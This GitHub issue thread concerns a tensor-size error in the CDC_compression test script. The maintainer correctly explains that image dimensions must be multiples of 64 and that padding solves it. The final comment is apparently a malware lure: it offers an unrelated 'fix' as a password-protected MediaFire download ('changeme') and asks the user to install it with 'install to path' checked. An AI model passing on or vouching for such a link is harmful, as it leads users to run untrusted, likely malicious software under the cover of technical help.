### ISSUE TITLE
Running test_epsilonparam.py reports an error

### ISSUE THREAD

**Issue by ziqiangduan-728** [buggyyang/CDC_compression#22]
Hello, when I run test_epsilonparam.py, it reports an error that the sizes of the two tensors in dimension 2 are inconsistent. Does the model have any requirements for the input image resolution? My input image resolution is 3264*2448? I hope to get your reply, thank you.
(exp_pytorch) dzq@TITAN:~/CDC_compression/epsilonparam$ python test_epsilonparam.py --ckpt /home/dzq/CDC_compression/weights/epsilon_param/big-l1-vimeo-d64-t20000-b0.1024-vbrFalse-noise-linear-aux0.9lpips_0.pt --img_dir /home/dzq/CDC_compression/800/3264x2448 --out_dir /home/dzq/CDC_compression/800/300/CDC_e1 --lpips_weight 0.9
Setting up [LPIPS] perceptual loss: trunk [vgg], v[0.1], spatial [off]
/home/dzq/anaconda3/envs/exp_pytorch/lib/python3.9/site-packages/torchvision/models/_utils.py:208: UserWarning: The parameter 'pretrained' is deprecated since 0.13 and may be removed in the future, please use 'weights' instead.
  warnings.warn(
/home/dzq/anaconda3/envs/exp_pytorch/lib/python3.9/site-packages/torchvision/models/_utils.py:223: UserWarning: Arguments other than a weight enum or `None` for 'weights' are deprecated since 0.13 and may be removed in the future. The current behavior is equivalent to passing `weights=VGG16_Weights.IMAGENET1K_V1`. You can also use `weights=VGG16_Weights.DEFAULT` to get the most up-to-date weights.
  warnings.warn(msg)
Loading model from: /home/dzq/anaconda3/envs/exp_pytorch/lib/python3.9/site-packages/lpips/weights/v0.1/vgg.pth
Processing image: 00081282.jpg
Input image shape: torch.Size([1, 3, 2448, 3264])
Traceback (most recent call last):
  File "/home/dzq/CDC_compression/epsilonparam/test_epsilonparam.py", line 94, in <module>
    main(args.device)
  File "/home/dzq/CDC_compression/epsilonparam/test_epsilonparam.py", line 76, in main
    compressed, bpp = diffusion.compress(
  File "/home/dzq/anaconda3/envs/exp_pytorch/lib/python3.9/site-packages/torch/utils/_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
  File "/home/dzq/CDC_compression/epsilonparam/modules/denoising_diffusion.py", line 205, in compress
    context_dict = self.context_fn(images, bitrate_scale)
  File "/home/dzq/anaconda3/envs/exp_pytorch/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
    return forward_call(*args, **kwargs)
  File "/home/dzq/CDC_compression/epsilonparam/modules/compress_modules.py", line 101, in forward
    q_latent, q_hyper_latent, state4bpp = self.encode(input, cond)
  File "/home/dzq/CDC_compression/epsilonparam/modules/compress_modules.py", line 66, in encode
    q_latent = quantize(latent, "dequantize", latent_distribution.mean)
  File "/home/dzq/CDC_compression/epsilonparam/modules/utils.py", line 86, in quantize
    return round_w_offset(x, offset)
  File "/home/dzq/CDC_compression/epsilonparam/modules/utils.py", line 76, in round_w_offset
    diff = STERound.apply(input - loc)
RuntimeError: The size of tensor a (153) must match the size of tensor b (156) at non-singleton dimension 2

**Comment by buggyyang** [comment]
yes. The resolution must be 64*n (where n is an integer >=1). So you need to pad the images before encoding.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
